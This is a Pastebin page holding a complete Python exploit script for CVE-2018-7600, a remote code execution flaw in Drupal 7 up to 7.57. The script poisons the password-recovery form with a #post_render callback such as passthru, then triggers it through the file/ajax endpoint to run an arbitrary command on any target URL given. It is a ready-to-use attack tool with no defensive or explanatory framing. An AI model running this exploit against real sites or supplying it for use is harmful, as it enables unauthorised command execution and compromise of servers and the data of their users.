API tools faq
paste
Advertisement
Kashmiri_Cheetah

Drupal Exploit 7 =< 7.5

Kashmiri_Cheetah
Aug 8th, 2018
1,611
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.88 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python3
  2.  
  3. import requests
  4. import argparse
  5. from bs4 import BeautifulSoup
  6.  
  7. def get_args():
  8. parser = argparse.ArgumentParser( prog="drupa7-CVE-2018-7600.py",
  9. formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
  10. epilog= '''
  11. This script will exploit the (CVE-2018-7600) vulnerability in Drupal 7 <= 7.57
  12. by poisoning the recover password form (user/password) and triggering it with
  13. the upload file via ajax (/file/ajax).
  14. ''')
  15. parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")
  16. parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
  17. parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")
  18. parser.add_argument("-p", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)")
  19. args = parser.parse_args()
  20. return args
  21.  
  22. def pwn_target(target, function, command, proxy):
  23. requests.packages.urllib3.disable_warnings()
  24. proxies = {'http': proxy, 'https': proxy}
  25. print('[*] Poisoning a form and including it in cache.')
  26. get_params = {'q':'user/password', 'name[#post_render][]':function, 'name[#type]':'markup', 'name[#markup]': command}
  27. post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'}
  28. r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
  29. soup = BeautifulSoup(r.text, "html.parser")
  30. try:
  31. form = soup.find('form', {'id': 'user-pass'})
  32. form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')
  33. if form_build_id:
  34. print('[*] Poisoned form ID: ' + form_build_id)
  35. print('[*] Triggering exploit to execute: ' + command)
  36. get_params = {'q':'file/ajax/name/#value/' + form_build_id}
  37. post_params = {'form_build_id':form_build_id}
  38. r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
  39. parsed_result = r.text.split('[{"command":"settings"')[0]
  40. print(parsed_result)
  41. except:
  42. print("ERROR: Something went wrong.")
  43. raise
  44.  
  45. def main():
  46. print ()
  47. print ('=============================================================================')
  48. print ('| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |')
  49. print ('| by pimps |')
  50. print ('=============================================================================\n')
  51.  
  52. args = get_args() # get the cl args
  53. pwn_target(args.target.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())
  54.  
  55.  
  56. if __name__ == '__main__':
  57. main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!